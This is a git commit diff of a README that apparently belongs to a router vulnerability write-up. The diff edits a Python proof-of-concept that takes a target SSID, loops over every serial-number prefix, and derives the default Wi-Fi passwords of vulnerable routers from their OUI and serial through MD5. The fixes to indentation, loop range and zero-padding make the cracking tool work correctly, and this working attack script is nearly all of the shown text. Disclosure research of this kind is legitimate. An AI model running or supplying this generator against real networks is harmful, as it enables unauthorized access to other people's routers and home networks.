Update 'Readme.md'
This commit is contained in:
parent
ff52954cad
commit
353e48ce73
1 changed files with 18 additions and 17 deletions
35
Readme.md
35
Readme.md
|
@ -493,28 +493,28 @@ With this information we can write a PoC script that can produce a wordlist to e
|
|||
import argparse, base64, hashlib, re
|
||||
|
||||
def genpwd_longpasswd(oui, serialnum):
|
||||
def str2md5(string):
|
||||
m = hashlib.md5()
|
||||
m.update(string.encode("ascii"))
|
||||
return m.digest()
|
||||
def str2md5(string):
|
||||
m = hashlib.md5()
|
||||
m.update(string.encode("ascii"))
|
||||
return m.digest()
|
||||
|
||||
#secret1 = "%s-ALCL%s" % (oui, serialnum)
|
||||
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
|
||||
#secret1 = "%s-ALCL%s" % (oui, serialnum)
|
||||
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
|
||||
|
||||
#md5_secret1 = str2md5(secret1)
|
||||
md5_secret2 = str2md5(secret2)
|
||||
#md5_secret1 = str2md5(secret1)
|
||||
md5_secret2 = str2md5(secret2)
|
||||
|
||||
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
|
||||
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
|
||||
|
||||
lower = upper = 0
|
||||
lower = upper = 0
|
||||
|
||||
for i in range(8):
|
||||
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
|
||||
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
|
||||
for i in range(8):
|
||||
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
|
||||
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
|
||||
|
||||
longpasswd = ((upper<<32)+lower)%0x2540be400
|
||||
longpasswd = ((upper<<32)+lower)%0x2540be400
|
||||
|
||||
return longpasswd
|
||||
return longpasswd
|
||||
|
||||
parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
|
||||
parser.add_argument("ssid", type=str, help="the ssid to attack")
|
||||
|
@ -551,8 +551,9 @@ for s in ssids:
|
|||
serialBytes = args.ssid
|
||||
for r in s.split("[A-F0-9]{4}"):
|
||||
serialBytes = serialBytes.replace(r, "")
|
||||
for i in range(0xffff):
|
||||
print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes)))
|
||||
for i in range(0xffff + 1):
|
||||
candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
|
||||
print(f"{candidate:010}")
|
||||
break
|
||||
```
|
||||
|
||||
|
|
Loading…
Reference in a new issue